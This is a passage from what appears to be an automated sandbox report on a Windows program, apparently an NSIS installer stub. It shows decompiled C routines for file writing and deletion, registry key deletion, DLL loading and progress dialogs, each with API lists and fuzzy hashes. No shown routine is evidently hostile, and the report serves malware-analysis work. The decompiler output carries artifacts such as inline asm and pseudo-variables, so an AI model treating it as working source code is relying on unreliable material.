                                                                                                                        						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                                                                                        					}
                                                                                                                        					CloseHandle( *(_t58 + 8));
                                                                                                                        				}
                                                                                                                        				_t53 = 0xfffffff3;
                                                                                                                        				if( *(_t58 - 8) < _t47) {
                                                                                                                        					_t53 = 0xffffffef;
                                                                                                                        					DeleteFileA( *(_t58 - 0x44));
                                                                                                                        					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                                                                                        				}
                                                                                                                        				_push(_t53);
                                                                                                                        				E00401423();
                                                                                                                        				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                                        • GlobalFree.KERNEL32 ref: 00402725
                                                                                                                        • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                                        • GlobalFree.KERNEL32 ref: 0040273E
                                                                                                                        • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3294113728-0
                                                                                                                        • Opcode ID: b8defe13902d58a52973a2e3f60156d7c1400e5746f24ef4cd0721e59596b3c4
                                                                                                                        • Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
                                                                                                                        • Opcode Fuzzy Hash: b8defe13902d58a52973a2e3f60156d7c1400e5746f24ef4cd0721e59596b3c4
                                                                                                                        • Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E00404F04(long _a4, intOrPtr _a8) {
                                                                                                                        				struct HWND__* _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				CHAR* _v32;
                                                                                                                        				long _v44;
                                                                                                                        				int _v48;
                                                                                                                        				void* _v52;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				long _t26;
                                                                                                                        				long _t27;
                                                                                                                        				long _t28;
                                                                                                                        				signed int _t36;
                                                                                                                        
                                                                                                                        				_t26 =  *0x423684;
                                                                                                                        				_v8 = _t26;
                                                                                                                        				if(_t26 != 0) {
                                                                                                                        					_t26 =  *0x423f54;
                                                                                                                        					_v12 = _t26;
                                                                                                                        					_t36 = _t26 & 0x00000001;
                                                                                                                        					if(_t36 == 0) {
                                                                                                                        						_t26 = E00405B88(0, _t36, 0x41fc78, 0x41fc78, _a4);
                                                                                                                        					}
                                                                                                                        					_push(0x41fc78);
                                                                                                                        					L00405B7C();
                                                                                                                        					_a4 = _t26;
                                                                                                                        					if(_a8 == 0) {
                                                                                                                        						L6:
                                                                                                                        						if((_v12 & 0x00000004) == 0) {
                                                                                                                        							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
                                                                                                                        						}
                                                                                                                        						if((_v12 & 0x00000002) == 0) {
                                                                                                                        							_v32 = 0x41fc78;
                                                                                                                        							_v52 = 1;
                                                                                                                        							_t28 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                                                        							_v44 = 0;
                                                                                                                        							_v48 = _t28 - _t36;
                                                                                                                        							SendMessageA(_v8, 0x1007 - _t36, 0,  &_v52);
                                                                                                                        							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                                                        						}
                                                                                                                        						if(_t36 != 0) {
                                                                                                                        							_t27 = _a4;
                                                                                                                        							 *((char*)(_t27 + 0x41fc78)) = 0;
                                                                                                                        							return _t27;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						_push(_a8);
                                                                                                                        						L00405B7C();
                                                                                                                        						_t26 = _t26 + _a4;
                                                                                                                        						if(_t26 < 0x800) {
                                                                                                                        							_push(_a8);
                                                                                                                        							_push(0x41fc78);
                                                                                                                        							L00405B82();
                                                                                                                        							goto L6;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t26;
                                                                                                                        			}

















                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                        • lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                        • lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                                        • SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2531174081-0
                                                                                                                        • Opcode ID: 6f5438f81cf7a4cf278200178885afddebba4b3e10535ae1fdd8142835d36988
                                                                                                                        • Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
                                                                                                                        • Opcode Fuzzy Hash: 6f5438f81cf7a4cf278200178885afddebba4b3e10535ae1fdd8142835d36988
                                                                                                                        • Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E00402BD3(intOrPtr _a4) {
                                                                                                                        				char _v68;
                                                                                                                        				long _t6;
                                                                                                                        				struct HWND__* _t7;
                                                                                                                        				struct HWND__* _t15;
                                                                                                                        
                                                                                                                        				if(_a4 != 0) {
                                                                                                                        					_t15 =  *0x41704c; // 0x0
                                                                                                                        					if(_t15 != 0) {
                                                                                                                        						_t15 =  *0x4071e8(_t15);
                                                                                                                        					}
                                                                                                                        					 *0x41704c = 0;
                                                                                                                        					return _t15;
                                                                                                                        				}
                                                                                                                        				__eflags =  *0x41704c; // 0x0
                                                                                                                        				if(__eflags != 0) {
                                                                                                                        					return E00405EC1(0);
                                                                                                                        				}
                                                                                                                        				_t6 = GetTickCount();
                                                                                                                        				__eflags = _t6 -  *0x423eac;
                                                                                                                        				if(_t6 >  *0x423eac) {
                                                                                                                        					__eflags =  *0x423ea8;
                                                                                                                        					if( *0x423ea8 == 0) {
                                                                                                                        						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
                                                                                                                        						 *0x41704c = _t7;
                                                                                                                        						return ShowWindow(_t7, 5);
                                                                                                                        					}
                                                                                                                        					__eflags =  *0x423f54 & 0x00000001;
                                                                                                                        					if(( *0x423f54 & 0x00000001) != 0) {
                                                                                                                        						wsprintfA( &_v68, "... %d%%", E00402BB7());
                                                                                                                        						return E00404F04(0,  &_v68);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t6;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • 73BC9840.USER32(00000000,00000000), ref: 00402BEB
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C09
                                                                                                                        • wsprintfA.USER32 ref: 00402C37
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                          • Part of subcall function 00404F04: lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C69
                                                                                                                          • Part of subcall function 00402BB7: MulDiv.KERNEL32(00000000,00000064,?), ref: 00402BCC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Windowlstrlen$C9840CountCreateDialogParamShowTextTicklstrcatwsprintf
                                                                                                                        • String ID: ... %d%%
                                                                                                                        • API String ID: 570735199-2449383134
                                                                                                                        • Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                                        • Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
                                                                                                                        • Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                                        • Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                        				long _v8;
                                                                                                                        				signed char _v12;
                                                                                                                        				unsigned int _v16;
                                                                                                                        				void* _v20;
                                                                                                                        				intOrPtr _v24;
                                                                                                                        				long _v56;
                                                                                                                        				void* _v60;
                                                                                                                        				long _t15;
                                                                                                                        				unsigned int _t19;
                                                                                                                        				signed int _t25;
                                                                                                                        				struct HWND__* _t28;
                                                                                                                        
                                                                                                                        				_t28 = _a4;
                                                                                                                        				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                                                        				if(_a8 == 0) {
                                                                                                                        					L4:
                                                                                                                        					_v56 = _t15;
                                                                                                                        					_v60 = 4;
                                                                                                                        					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                                                        					return _v24;
                                                                                                                        				}
                                                                                                                        				_t19 = GetMessagePos();
                                                                                                                        				_v16 = _t19 >> 0x10;
                                                                                                                        				_v20 = _t19;
                                                                                                                        				ScreenToClient(_t28,  &_v20);
                                                                                                                        				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                                                        				if((_v12 & 0x00000066) != 0) {
                                                                                                                        					_t15 = _v8;
                                                                                                                        					goto L4;
                                                                                                                        				}
                                                                                                                        				return _t25 | 0xffffffff;
                                                                                                                        			}















                                                                                                                        APIs
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047EE
                                                                                                                        • GetMessagePos.USER32 ref: 004047F6
                                                                                                                        • ScreenToClient.USER32 ref: 00404810
                                                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404822
                                                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404848
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                        • String ID: f
                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                        • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                        • Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
                                                                                                                        • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                        • Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                        				char _v68;
                                                                                                                        				void* _t11;
                                                                                                                        				CHAR* _t19;
                                                                                                                        
                                                                                                                        				if(_a8 == 0x110) {
                                                                                                                        					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                        					_a8 = 0x113;
                                                                                                                        				}
                                                                                                                        				if(_a8 == 0x113) {
                                                                                                                        					_t11 = E00402BB7();
                                                                                                                        					_t19 = "unpacking data: %d%%";
                                                                                                                        					if( *0x423eb0 == 0) {
                                                                                                                        						_t19 = "verifying installer: %d%%";
                                                                                                                        					}
                                                                                                                        					wsprintfA( &_v68, _t19, _t11);
                                                                                                                        					SetWindowTextA(_a4,  &_v68);
                                                                                                                        					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                                                        				}
                                                                                                                        				return 0;
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                                        • wsprintfA.USER32 ref: 00402B8A
                                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402B9A
                                                                                                                        • SetDlgItemTextA.USER32 ref: 00402BAC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                        • API String ID: 1451636040-1158693248
                                                                                                                        • Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                                        • Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
                                                                                                                        • Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                                        • Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 59%
                                                                                                                        			E00401F51(void* __ebx, void* __eflags) {
                                                                                                                        				void* _t27;
                                                                                                                        				struct HINSTANCE__* _t30;
                                                                                                                        				CHAR* _t32;
                                                                                                                        				intOrPtr* _t33;
                                                                                                                        				void* _t34;
                                                                                                                        
                                                                                                                        				_t27 = __ebx;
                                                                                                                        				asm("sbb eax, 0x423f58");
                                                                                                                        				 *(_t34 - 4) = 1;
                                                                                                                        				if(__eflags < 0) {
                                                                                                                        					_push(0xffffffe7);
                                                                                                                        					L15:
                                                                                                                        					E00401423();
                                                                                                                        					L16:
                                                                                                                        					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				_t32 = E004029F6(0xfffffff0);
                                                                                                                        				 *(_t34 + 8) = E004029F6(1);
                                                                                                                        				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
                                                                                                                        					L3:
                                                                                                                        					_t30 = LoadLibraryExA(_t32, _t27, 8);
                                                                                                                        					if(_t30 == _t27) {
                                                                                                                        						_push(0xfffffff6);
                                                                                                                        						goto L15;
                                                                                                                        					}
                                                                                                                        					L4:
                                                                                                                        					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                                                        					if(_t33 == _t27) {
                                                                                                                        						E00404F04(0xfffffff7,  *(_t34 + 8));
                                                                                                                        					} else {
                                                                                                                        						 *(_t34 - 4) = _t27;
                                                                                                                        						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
                                                                                                                        							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B");
                                                                                                                        						} else {
                                                                                                                        							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
                                                                                                                        							if( *_t33() != 0) {
                                                                                                                        								 *(_t34 - 4) = 1;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
                                                                                                                        						FreeLibrary(_t30);
                                                                                                                        					}
                                                                                                                        					goto L16;
                                                                                                                        				}
                                                                                                                        				_t30 = GetModuleHandleA(_t32);
                                                                                                                        				if(_t30 != __ebx) {
                                                                                                                        					goto L4;
                                                                                                                        				}
                                                                                                                        				goto L3;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                          • Part of subcall function 00404F04: lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                        • String ID: ?B
                                                                                                                        • API String ID: 2987980305-117478770
                                                                                                                        • Opcode ID: bbef6d334c2bb730698496685ff769ac622b2bb5dc5f46c6922e2c1a943cafbf
                                                                                                                        • Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
                                                                                                                        • Opcode Fuzzy Hash: bbef6d334c2bb730698496685ff769ac622b2bb5dc5f46c6922e2c1a943cafbf
                                                                                                                        • Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
                                                                                                                        				void* _v8;
                                                                                                                        				char _v272;
                                                                                                                        				long _t18;
                                                                                                                        				intOrPtr* _t27;
                                                                                                                        				long _t28;
                                                                                                                        
                                                                                                                        				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
                                                                                                                        				if(_t18 == 0) {
                                                                                                                        					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                                                        						if(_a12 != 0) {
                                                                                                                        							RegCloseKey(_v8);
                                                                                                                        							L8:
                                                                                                                        							return 1;
                                                                                                                        						}
                                                                                                                        						if(E00402A36(_v8,  &_v272, 0) != 0) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					RegCloseKey(_v8);
                                                                                                                        					_t27 = E00405E88(2);
                                                                                                                        					if(_t27 == 0) {
                                                                                                                        						if( *0x423f50 != 0) {
                                                                                                                        							goto L8;
                                                                                                                        						}
                                                                                                                        						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                                                                        						if(_t28 != 0) {
                                                                                                                        							goto L8;
                                                                                                                        						}
                                                                                                                        						return _t28;
                                                                                                                        					}
                                                                                                                        					return  *_t27(_a4, _a8,  *0x423f50, 0);
                                                                                                                        				}
                                                                                                                        				return _t18;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1912718029-0
                                                                                                                        • Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                                        • Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
                                                                                                                        • Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                                        • Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00401CC1(int __edx) {
                                                                                                                        				void* _t17;
                                                                                                                        				struct HINSTANCE__* _t21;
                                                                                                                        				struct HWND__* _t25;
                                                                                                                        				void* _t27;
                                                                                                                        
                                                                                                                        				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                                                                                                        				GetClientRect(_t25, _t27 - 0x40);
                                                                                                                        				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                                                                                        				if(_t17 != _t21) {
                                                                                                                        					DeleteObject(_t17);
                                                                                                                        				}
                                                                                                                        				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32 ref: 00401CC5
                                                                                                                        • GetClientRect.USER32 ref: 00401CD2
                                                                                                                        • LoadImageA.USER32 ref: 00401CF3
                                                                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1849352358-0
                                                                                                                        • Opcode ID: c0b5d6f5fd98bc6365335fa1ca8c03edfb6534782bc97ff6e07cc3447251dcb0
                                                                                                                        • Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
                                                                                                                        • Opcode Fuzzy Hash: c0b5d6f5fd98bc6365335fa1ca8c03edfb6534782bc97ff6e07cc3447251dcb0
                                                                                                                        • Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 40%
                                                                                                                        			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                                        				char _v36;
                                                                                                                        				char _v68;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* _t26;
